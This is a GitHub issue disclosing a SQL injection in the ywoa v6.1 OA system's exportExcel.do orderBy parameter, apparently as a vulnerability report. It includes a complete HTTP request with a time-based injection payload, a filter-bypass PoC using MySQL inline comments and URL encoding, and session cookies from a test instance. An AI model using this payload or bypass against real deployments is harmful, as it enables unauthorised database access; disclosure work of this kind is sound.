Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection exists in ywoa v6.1 backend/oa/visual/exportExcel.do interface #26

Open
xuenixiang opened this issue Aug 22, 2022 · 0 comments

Comments

@xuenixiang
Copy link

Environment construction

http://partner.yimihome.com/static/index.html#/index/sys_env

image-20220722103741100

Direct one-click installation can be started, and then login on the account admin password 1111111, login if prompted authentication expired can not log in, change the local system time can

http://172.16.140.189:8088/oa/setup/license.jsp

Once installed here, the source code is available for download at gitee

https://gitee.com/bestfeng/yimioa

Download a good local idea to open a static look at the code on

image-20220722103950332

idea

Download: http://partner.yimihome.com/static/index.html#/index/idea_deploy First set it up as shown here, after setting it up, import the database, after importing, you need to change the link configuration yimioa/c-core/src/main/ resources/application.properties Modify the mysql connection information, and then just start img But idea start, more bugs, and report more errors, here is idea static look at the code

/oa/visual/exportExcel.do interface orderby injection Bypass

Vulnerability recurrence

GET /oa/visual/exportExcel.do?code=personbasic&orderBy=id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)&op=1&sort=desc&isMine=true HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=339C404636300F5F43B74EC828919D11; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl

bypass poc

%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)

Code audit and function implementation

Did not find the corresponding web function point, here is a direct look at the static code interface audit

orderby, here the parameters, and then look down, because the above personnel function point that GET injection already know getModuleListSqlAndUrlStr method, so look down, directly orderby passed in
So it causes SQL injection, if not bypass, there will be no problem, after all, the filter method has been bypassed.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant